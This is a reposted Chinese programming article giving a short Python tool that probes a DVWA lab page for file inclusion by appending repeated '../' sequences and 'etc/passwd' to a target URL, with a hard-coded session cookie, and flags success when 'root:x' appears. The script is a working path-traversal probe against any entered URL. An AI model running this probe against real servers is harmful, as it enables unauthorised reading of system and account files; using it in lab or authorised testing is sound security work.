文件包含漏洞自动化测试代码

本文主要是介绍文件包含漏洞自动化测试代码，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

import requests
import sys
import termcolor
"""
以DVWA Web应用为目标进行测试，选择其含有文件包含漏洞的页面
Target URL:  http://192.168.140.137/dvwa/vulnerabilities/fi/?page=
"""
def banner():
    banner = """
            ******************************************************************
            ******************************************************************
                            File Inclusion Test Tool by Jason Wong V1.0
            ******************************************************************
            ******************************************************************
            Warning:Your target URL should be like http://example.com/index.php?file=

        """
    print(banner)

def main():
    banner()
    target_url = input("Enter target url to test: ")
    payloads = 'etc/passwd'
    cookies = {
    "PHPSESSID": "da096185e02e1ee5b6edf69fdc83c855",
    "security": "low"
    }
    detect_flag = False
    print('\nTest results: \n\n')
    try:
        for i in range(1,10):
            url = target_url + "../"*i + payloads 
            # print(url)
            response = requests.get(url=url, cookies=cookies).text
            # print(response)
            if 'root:x' in response:
                print(url,'\n')
                print(termcolor.colored("\tFile Including Vulnerability Found!", 'blue'))
                detect_flag = True
                break
    except KeyboardInterrupt:
        print("Exit the program")
        sys.exit()

    if detect_flag == False:
        print("No File Inclusion Vulnerability Found!")

if __name__ == "__main__":
    main()

这篇关于文件包含漏洞自动化测试代码的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！